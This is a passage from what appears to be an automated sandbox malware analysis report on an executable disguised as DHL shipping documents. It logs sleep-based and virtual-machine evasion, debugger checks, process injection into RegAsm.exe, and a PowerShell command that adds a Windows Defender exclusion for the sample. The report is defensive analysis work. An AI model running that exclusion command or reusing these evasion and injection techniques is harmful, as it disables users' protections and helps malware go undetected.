                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -595890s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -595781s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -595672s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -595562s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -595453s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -595343s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -595234s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -595125s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -595015s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -594904s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -594797s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -594687s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -594578s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -594468s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -594359s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -594250s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -594140s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -594031s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -593901s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -593795s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599875Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599762Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599615Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599484Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599374Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599262Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599156Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599044Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598937Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598823Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598687Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598578Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598428Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598156Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597859Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597750Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597640Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597531Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597422Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597312Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597203Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597094Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596984Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596875Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596765Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596656Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596543Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596437Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596328Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596219Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596109Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595890Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595781Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595672Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595562Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595453Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595343Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595234Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595125Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595015Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594904Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594797Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594687Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594578Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594468Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594359Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594250Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594140Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594031Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 593901Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 593795Jump to behavior
                      Source: Amcache.hve.8.drBinary or memory string: VMware
                      Source: Amcache.hve.8.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin
                      Source: Amcache.hve.8.drBinary or memory string: VMware, Inc.
                      Source: Documents Of DHL -BL- AWB- 8976453410.exe, 00000000.00000002.1450167139.00000220398D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: Amcache.hve.8.drBinary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.8.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: Amcache.hve.8.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.8.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.8.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Documents Of DHL -BL- AWB- 8976453410.exe, 00000000.00000002.1450167139.00000220398D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
                      Source: Documents Of DHL -BL- AWB- 8976453410.exe, 00000000.00000002.1450167139.00000220398D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
                      Source: Amcache.hve.8.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: Documents Of DHL -BL- AWB- 8976453410.exe, 00000000.00000002.1450167139.00000220398D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                      Source: Documents Of DHL -BL- AWB- 8976453410.exe, 00000000.00000002.1450167139.00000220398D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                      Source: Amcache.hve.8.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.8.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: RegAsm.exe, 00000004.00000002.3698342282.0000000006616000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: Amcache.hve.8.drBinary or memory string: vmci.sys
                      Source: Documents Of DHL -BL- AWB- 8976453410.exe, 00000000.00000002.1450167139.00000220398D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
                      Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin`
                      Source: Documents Of DHL -BL- AWB- 8976453410.exe, 00000000.00000002.1450167139.00000220398D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                      Source: Amcache.hve.8.drBinary or memory string: \driver\vmci,\driver\pci
                      Source: Documents Of DHL -BL- AWB- 8976453410.exe, 00000000.00000002.1450167139.00000220398D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
                      Source: Documents Of DHL -BL- AWB- 8976453410.exe, 00000000.00000002.1450836685.0000022049842000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3674535652.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: hgfsZrw6
                      Source: Documents Of DHL -BL- AWB- 8976453410.exe, 00000000.00000002.1450167139.00000220398D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                      Source: Amcache.hve.8.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.8.drBinary or memory string: VMware20,1
                      Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.8.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.8.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.8.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.8.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.8.drBinary or memory string: VMware PCI VMCI Bus Device
                      Source: Documents Of DHL -BL- AWB- 8976453410.exe, 00000000.00000002.1450167139.00000220398D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
                      Source: Documents Of DHL -BL- AWB- 8976453410.exe, 00000000.00000002.1450167139.00000220398D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
                      Source: Amcache.hve.8.drBinary or memory string: VMware VMCI Bus Device
                      Source: Amcache.hve.8.drBinary or memory string: VMware Virtual RAM
                      Source: Amcache.hve.8.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: Amcache.hve.8.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                      Source: Amcache.hve.8.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exe" -Force
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exe" -ForceJump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 440000Jump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 442000Jump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 10CA008Jump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exe" -ForceJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeQueries volume information: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
